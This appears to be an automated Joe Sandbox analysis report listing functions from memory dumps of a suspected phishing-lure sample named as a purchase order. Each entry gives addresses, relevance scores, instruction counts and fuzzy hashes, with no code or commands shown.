Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f005c3d5549f67fe31f56e1ed0556796a12a03e02e942a1905c5b0a15c703a7
Instruction ID: d0c3f4d3a270444cb5ec926501becee0f111a30bd7bcc21a55da9ce1062ab4ba
Opcode Fuzzy Hash: 2f005c3d5549f67fe31f56e1ed0556796a12a03e02e942a1905c5b0a15c703a7
Instruction Fuzzy Hash: 60D1E372A0020A9BDB14DF68C881BBB77E6BF44344F184529FE51DB2A1EF34E942DB50

Function 010969B0 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f24bc749f65f89b7a92c6dfc6480eb4936830b99fb9066671cb9ab5dc883653
Instruction ID: 2a7b4086afd791cad809d0cd3aba60635f7da72eec6fe68bb82c4aa729d65afa
Opcode Fuzzy Hash: 2f24bc749f65f89b7a92c6dfc6480eb4936830b99fb9066671cb9ab5dc883653
Instruction Fuzzy Hash: B5E15E70D002599BCF55DFA9C5A0AFEBBF5BF49304F148099E894E7241E336D981DBA0

Function 01013800 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f330dd997994b155e6650376d1133cb56d68a864f348ce617d9716cc5c71452
Instruction ID: 6f86f014f155b495808791bb1c3eef3661435c6667c7216f99d7226d7c61801c
Opcode Fuzzy Hash: 6f330dd997994b155e6650376d1133cb56d68a864f348ce617d9716cc5c71452
Instruction Fuzzy Hash: CFE18F75A00205CFDB18CF58C881AAEBBF5FF48320F1581A9E995EB395D735E941CBA0

Function 0102D210 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77644eb389a30c19869042078f4979503c25dcd1c694c20ea98f9ab63e144e57
Instruction ID: 228eb1c891d9aecb1d7bb144d27f5d03f1dabe142a8c3ce6ecfe7e5e1d8348da
Opcode Fuzzy Hash: 77644eb389a30c19869042078f4979503c25dcd1c694c20ea98f9ab63e144e57
Instruction Fuzzy Hash: 84B1F826B106248BDB1DCA5CCCA137E67A7EFD6320F19C2AAC9974F7D9D5388D058342

Function 01010445 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5f65342ff491f54227451891a770b44ac4d5de039f1ed150bf1686bc4e7e1d
Instruction ID: 6621b29916ff8e457ce61d7806109d8aa7f9792c753897b0f42733a7f961c682
Opcode Fuzzy Hash: 9a5f65342ff491f54227451891a770b44ac4d5de039f1ed150bf1686bc4e7e1d
Instruction Fuzzy Hash: 16B107717046469FDB25CBA8C890BBEBBF9AF84310F1405A5E6D2DB349DB34D981C750

Function 01020D01 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4f662aeda139f9802249ac8c59e3e75b65a35351bbad6d15b33e61159f54f8
Instruction ID: fcd59b3035dfcd4e3598e068ed9d23fa3e963fce59ebe06e936a028ee5d70bdf
Opcode Fuzzy Hash: 0b4f662aeda139f9802249ac8c59e3e75b65a35351bbad6d15b33e61159f54f8
Instruction Fuzzy Hash: 84C15C70E00319DFDB25DFA9C884AAEBBB9FF48304F10412AE585AB649D775A841CF50

Function 010082E0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b84dbb277fee6d02ef1b3580324c6a3a530bb99d516c944a5d6693ec98bd4f4
Instruction ID: 544f1689bae3d6f77de9949d0f12675bdfbca32ae86d930118ca5b6dfaebc0ff
Opcode Fuzzy Hash: 7b84dbb277fee6d02ef1b3580324c6a3a530bb99d516c944a5d6693ec98bd4f4
Instruction Fuzzy Hash: 08C148746083418FE7A5CF18C494BABB7E5BF98304F44896EE9C987291DB74E904CF92

Function 00FFC3C7 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffa4a8f0be9158b4b55c8ca615eabe0774587c0e370250f705e2495e6a225154
Instruction ID: 48c9efcf32f29c1dcdc3a720417215ebd65a8da65196b5ca35af6e3c74e81b98
Opcode Fuzzy Hash: ffa4a8f0be9158b4b55c8ca615eabe0774587c0e370250f705e2495e6a225154
Instruction Fuzzy Hash: D0B19170A0026D8BDB74DF54C990BBAB3F5EF44704F0885E9D54AE7290EB34AD85DB60

Function 010400A5 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e12a1ed5bbe26a47fea82b1c5691ba08aec7c862334198e3adc3142ea06b71
Instruction ID: 0f3fea2e38e663ee10f753bc79657de09994fb3a333ca1c0c068209230043799
Opcode Fuzzy Hash: 78e12a1ed5bbe26a47fea82b1c5691ba08aec7c862334198e3adc3142ea06b71
Instruction Fuzzy Hash: CDA18DB0B006169BDB25DF69C9C0BEABBF5FF44315F004069FA85A7285DB34A811DB90

Function 0101E310 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32771faa2445fb130862a82a19b04301ad804496f513b35da4ddc3b786ec4fc0
Instruction ID: 0468c6f6f59eeb4699f762c95c1c270c0cae3d3c7b521a8ec4012a3cd258b3f0
Opcode Fuzzy Hash: 32771faa2445fb130862a82a19b04301ad804496f513b35da4ddc3b786ec4fc0
Instruction Fuzzy Hash: 95913231A00616CFD722DB68C484BBEBBE5FF84714F1580A9EEC19B688DB3D9901C791

Function 01034670 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d28866923912aea037caaf76b29b6ebc11f287a642a7a1a27c71e49542574e
Instruction ID: 50edbace051999a06ba28cdc4ca7bb260a985b0aeb1b82e6f8643c4c50f1f3c8
Opcode Fuzzy Hash: 52d28866923912aea037caaf76b29b6ebc11f287a642a7a1a27c71e49542574e
Instruction Fuzzy Hash: 08814C21E04256CFEB228E6CC4D02ADBB99FF93700B1846BAE5C2DF341C265DC45E796

Function 010CF330 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35692934fd5465e82efea17e489559a063b593ea998ecb27f7350c9abe26e6d9
Instruction ID: 5979f50914e727ee95fa3e43fccc41e48ea3c5038d37a6c1fac82ba05c5a8925
Opcode Fuzzy Hash: 35692934fd5465e82efea17e489559a063b593ea998ecb27f7350c9abe26e6d9
Instruction Fuzzy Hash: E391B471A00207ABEB51CF68C8407AEBBE2EF54710F1485BDEA95DB285D774D901CF51

Function 010CEFBF Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53b50d27610384090b45610f853350ca8e11faf6378afda6a7c20e936ab17cc
Instruction ID: 1f51820a46e19b8c4e5d79c355f74a4c01b5d9a181a83b82bda1eb11d5e9a1ad
Opcode Fuzzy Hash: a53b50d27610384090b45610f853350ca8e11faf6378afda6a7c20e936ab17cc
Instruction Fuzzy Hash: 6891D372A1011A9BDB18CF79C8916BEBBF2FF88310B1981AEE855DB385D734D905CB50

Function 00EC3C0B Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eef4303b03deea3d92e220971a83e8adb5e19b1352e45c7483854bb7dbac129
Instruction ID: 4eebd58956bc8081d8b9e6f80cd36fb5119f9d54156756936ab681182bb5f259
Opcode Fuzzy Hash: 4eef4303b03deea3d92e220971a83e8adb5e19b1352e45c7483854bb7dbac129
Instruction Fuzzy Hash: EB91F83020CB848FD7A4DB2CC554B6ABBE1FBD9304F54892DA1DAD3361DA35D941CB02

Function 01010D69 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72af526a1791551bc160adb6856c72ca4b80ee8cb50937a83d0565e6519f3baf
Instruction ID: ad5a9bf35804709e3b52a9631b219730121d8db109b54f37b9a6a1bf1dc61a5e
Opcode Fuzzy Hash: 72af526a1791551bc160adb6856c72ca4b80ee8cb50937a83d0565e6519f3baf
Instruction Fuzzy Hash: 86818F31A001199FDB55CE6EC8909AEBBF2FF85350B688299F4D49B34DD734E981CB90

Function 0105693A Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6647c1a19ebc21bb1ee77878fb8d6ed51854f5c75f05ada2f811ac3f3a1bba
Instruction ID: 648ee4f182fa761e20341d7b8b98623b210b1254cf7617db4668cc513a5b3869
Opcode Fuzzy Hash: 9d6647c1a19ebc21bb1ee77878fb8d6ed51854f5c75f05ada2f811ac3f3a1bba
Instruction Fuzzy Hash: 6D8172B1A0061A9BEB54CF69C880AFFBBF9FB48700F04852EE985D7640E735D941CB94

Function 010BE076 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a22785d398eeb22dfe5e8cd4df73c05d005c99cbbd8ee6013324f19b526d415
Instruction ID: 6bb2e69ef83d95c1ae3af61b5fe1682d89769ce70cf1a2e114f0d0611e2cbcf9
Opcode Fuzzy Hash: 3a22785d398eeb22dfe5e8cd4df73c05d005c99cbbd8ee6013324f19b526d415
Instruction Fuzzy Hash: 7B818F72A002159FDB18CF98C9816EDFBF2EF89310B2981A9D856EB385D7349D41CB90

Function 00FF6CC0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5834d6461bcc1afc46e3f1c3a0b46aef24d0a7a1b11a7b27c3b9163c0e77fe
Instruction ID: f7d4c600156c35f4feef30274d3733e92fe8dcd12157b4c0f144efb1fe1107ef
Opcode Fuzzy Hash: fd5834d6461bcc1afc46e3f1c3a0b46aef24d0a7a1b11a7b27c3b9163c0e77fe
Instruction Fuzzy Hash: 52718E75604743DBEBA1CF19C980B6BB7E8FB44258F15496AEE95D7200D730E844CBE2

Function 0103E1A4 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bc445e461e32c178f533975db21c4ab8168974a343f393d3fec97ea6eda683
Instruction ID: 555acf5feb00645ff5fc1cf2e4387daa1b6ecf213bf4dfc50904b351cf546d1a
Opcode Fuzzy Hash: d6bc445e461e32c178f533975db21c4ab8168974a343f393d3fec97ea6eda683
Instruction Fuzzy Hash: D5816371A00609EFDB25DFA8C880BEEB7F9FF88354F148529E595A7210DB30AD45CB60

Function 0101C560 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3340cf5ae69b9091762fe09278c34daf2ee4937bfaa2851e89b184506f1e5b35
Instruction ID: 73d7bd13f528c586b59565b2ae92c80a4a14c3c88e9621f55c7637dfe01daa12
Opcode Fuzzy Hash: 3340cf5ae69b9091762fe09278c34daf2ee4937bfaa2851e89b184506f1e5b35
Instruction Fuzzy Hash: CF71DFB1904629DBDB25CF58C9907BEBBF8FF49710F14855AE982AB344D7399800CBA0

Function 00EBCB13 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e447c054048309da70a4e877dbc8c4509e6822ebca9992369e046b25588647
Instruction ID: e71725de199b3aa482c058a16a5ba3e98ce9db77b52e40ba0e93afad0c7f5ed1
Opcode Fuzzy Hash: 78e447c054048309da70a4e877dbc8c4509e6822ebca9992369e046b25588647
Instruction Fuzzy Hash: 2C517074A24B499F8B9CEF38805922BF3D1FB892007909B3E909BE3691DF35D8064780

Function 010BD646 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e707140511553adc0d36ebbc5d61060a2ef7a0d7bb75718c70f7a14b2aa62f
Instruction ID: 9cf591f6aed8c67a3cb341c5301b75180f4e353e507487cb0de2e04e592806ad
Opcode Fuzzy Hash: b4e707140511553adc0d36ebbc5d61060a2ef7a0d7bb75718c70f7a14b2aa62f
Instruction Fuzzy Hash: 5D815A70D002459ADB25CFAAC484AEEFBF1FF49B19F00849AE8D9AB241D3359841DF54

Function 0101252B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6039c601723a8aa17338e07a32d892bba8c2aed7511d5fddfe9830e987c38a6b
Instruction ID: 9b48b2cc4240d995b7de1428900c09a3d06c41a96deb344c1fe56b8448b3ac1a
Opcode Fuzzy Hash: 6039c601723a8aa17338e07a32d892bba8c2aed7511d5fddfe9830e987c38a6b
Instruction Fuzzy Hash: EE71D0316046428FD352DF2CC890B6AB7E5FF88700F1585A9E899CB396DB38D945CBA1

Function 010C6C69 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984c11c16cb7833d26115ba427e9c7667dd974948106ab90a9788ca16b75e3b4
Instruction ID: 6678d4a507be6475387c25f64f1aaf5c9858c071c5323c920d3347e4030ee2c7
Opcode Fuzzy Hash: 984c11c16cb7833d26115ba427e9c7667dd974948106ab90a9788ca16b75e3b4
Instruction Fuzzy Hash: F9618071E0021B9BDB25AFA9C8849FFB7A9AF54B00F00407ED992A7341DA35D9418F90

Function 010BEC4C Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e282fde04d98c6a93e9be30c70072cb9c13e714a7c93939a12d63fca4412217a
Instruction ID: 6ee1877fa5a33862508c1eb316ade4f3c3ce58c2bf3be7523cd63af5ace67849
Opcode Fuzzy Hash: e282fde04d98c6a93e9be30c70072cb9c13e714a7c93939a12d63fca4412217a
Instruction Fuzzy Hash: DD718B35A00626CBDBA4CF1DC0C01FAB7F1FF44301B6448AEDAD29B640D3B5A991CB90

Function 010089C0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170bc26e0fd5fadb75cf1a70bfdbb0a44afa98df5ee1ebd5f479c6458f33dcc5
Instruction ID: 757bf34e5dd4d65b064223c74f4922ef88efb15a35fed3a2960a4ee87bf3cc2f
Opcode Fuzzy Hash: 170bc26e0fd5fadb75cf1a70bfdbb0a44afa98df5ee1ebd5f479c6458f33dcc5
Instruction Fuzzy Hash: 6B819E31A08206CFFB25CF58C584BAE77F6BF58310F15416EEA84AB682D7759D80CB90

Function 010C75C6 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02cca7ff2176a178d746eb7a5e285af90d882578dc8dfede464e96aaf0e48086
Instruction ID: a24276ff3abdc015a2f0a40cb1d978e2c7ec58d006a4a891ba503f7578c80e13
Opcode Fuzzy Hash: 02cca7ff2176a178d746eb7a5e285af90d882578dc8dfede464e96aaf0e48086
Instruction Fuzzy Hash: 7D512B75A0012A5BCB14DF5DC880ABEBBE2FF98B10B15429DE9D5D7385DA34C942CF90

Function 00FFCEF0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
Instruction ID: 1fc241838b0e6f582728e4821a89313d5f732b44760c19d44dea1fc0aa5b6409
Opcode Fuzzy Hash: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
Instruction Fuzzy Hash: C0717C72640B1ADBD7B24E18C644B32FBE1BF90361F240B5DDED2469F2D764A840EB90

Function 010C0EAD Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24b8f47ac067afd0e2a1156a98c49a3c2f9d610958683e7d170d8c5665d6b3a
Instruction ID: 5e7438d5cf6752be1a61b69dc1f87cebdf1f9e6e10b1b40ed54d6b09b0c5c213
Opcode Fuzzy Hash: d24b8f47ac067afd0e2a1156a98c49a3c2f9d610958683e7d170d8c5665d6b3a
Instruction Fuzzy Hash: AD813875A00249DFCB09CFA9C490AAEBBF1BF48310F1581ADE859AB355D734EA51CF90

Function 010C8BBE Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8ce1746e7587de575d984ff40589d4e70563b8eac337f2deb8a199f6ea643f
Instruction ID: e155c3e81f96c8905ba1e5059ec62c67c143aee630f38181fd52983e27030216
